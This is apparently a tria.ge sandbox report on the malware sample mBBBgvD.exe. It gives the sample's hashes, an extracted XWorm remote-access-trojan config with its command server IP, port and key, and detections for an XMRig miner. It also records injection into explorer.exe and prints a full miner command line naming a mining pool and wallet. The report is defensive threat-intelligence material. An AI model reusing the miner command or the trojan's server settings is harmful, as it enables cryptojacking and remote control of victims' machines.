Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
123s -
max time network
146s -
platform
windows11-21h2_x64 -
resource
win11-20250218-en -
resource tags
arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system -
submitted
01/03/2025, 14:41
Static task
static1
Behavioral task
behavioral1
Sample
mBBBgvD.exe
Resource
win10ltsc2021-20250217-en
General
-
Target
mBBBgvD.exe
-
Size
2.3MB
-
MD5
120b148606efb6400aa3aeb9ce44a668
-
SHA1
e7488d6d0893c4d074f69718c8ee32da42d98207
-
SHA256
607626fde0a0263edd41db4721523682cb343600ef083fc78f23f04ca8be04b1
-
SHA512
6a5888c08f9378805978f53fd01a93dcc7f202198c12e57376c794e3f60d04c1b67dd6f51156c2ded32ae318cf73baa2b9f811fe1e99de4ddc86ac35bc2a2a43
-
SSDEEP
49152:W1vr8uwYtUeKFj/c2e4r7XplKVZo0juLx1hZf18E2yujq3:W1freFj/c2e4rinaj8E2hg
Malware Config
Extracted
xworm
95.164.19.68:1987
humtwXiPPZ6S5Ma5
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x001a00000002afed-22.dat family_xworm behavioral2/memory/2716-25-0x0000000000B90000-0x0000000000BA2000-memory.dmp family_xworm -
Xmrig family
-
Xworm family
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/1572-29-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-30-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-31-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-34-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-37-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-39-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-38-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-36-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-35-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-43-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/1572-44-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 1100 y8GsvEZR3Z.exe 2716 qTsTa8RbD0.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1100 set thread context of 1572 1100 y8GsvEZR3Z.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mBBBgvD.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2716 qTsTa8RbD0.exe Token: SeDebugPrivilege 1100 y8GsvEZR3Z.exe Token: SeLockMemoryPrivilege 1572 explorer.exe Token: SeLockMemoryPrivilege 1572 explorer.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3436 wrote to memory of 1100 3436 mBBBgvD.exe 85 PID 3436 wrote to memory of 1100 3436 mBBBgvD.exe 85 PID 3436 wrote to memory of 2716 3436 mBBBgvD.exe 86 PID 3436 wrote to memory of 2716 3436 mBBBgvD.exe 86 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88 PID 1100 wrote to memory of 1572 1100 y8GsvEZR3Z.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\mBBBgvD.exe"C:\Users\Admin\AppData\Local\Temp\mBBBgvD.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Users\Admin\AppData\Roaming\y8GsvEZR3Z.exe"C:\Users\Admin\AppData\Roaming\y8GsvEZR3Z.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=83WC3ZPssiBd2F1wky22B8jUzY9vMUhR7DT8D7fqbm3SRjBzHiRm4ShbVzFZ72oousCnk8UTWMMRq9L2HHkka8D9Mm6TWM6 --pass=x --cpu-max-threads-hint=203⤵
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
-
C:\Users\Admin\AppData\Roaming\qTsTa8RbD0.exe"C:\Users\Admin\AppData\Roaming\qTsTa8RbD0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=3912,i,5616534977014849087,11887380551757527862,262144 --variations-seed-version --mojo-platform-channel-handle=4664 /prefetch:141⤵PID:1924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4100,i,5616534977014849087,11887380551757527862,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:141⤵PID:2896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
47KB
MD53849de855221df5c59aaf6da5ed9d7e6
SHA109d3eb1497ab5f7309bb89650108385e2c9f17c5
SHA2560373a886b98fcfec95445ba4232269961bd6eddda3612f08d0c57a2c3ba7ea6d
SHA512d6c1adf42b0b8d56a5a0f5dba64cc0053b8051fe08f8e8e642d3663ea8fc2639f24cd2ad42e8d8e9012c42ded48a2cf1251230c70d7c61021ba196928e2e02be
-
Filesize
2.1MB
MD5b2a071577416531d00c3292c79d4948e
SHA19918560650b15f7320361c003ab74c4c2009fe80
SHA2563fcadd3a9814a92abb993d778461db81480ba979b0da02f61947bc9fa99dbea6
SHA5126a939c6c43819fc84108a240d530aeb41c3ddfda52bf33430e24db9fba69e5c8577b3cace41c929179b306bf75c132410b45cc70d3e0692ad95ed34dec658175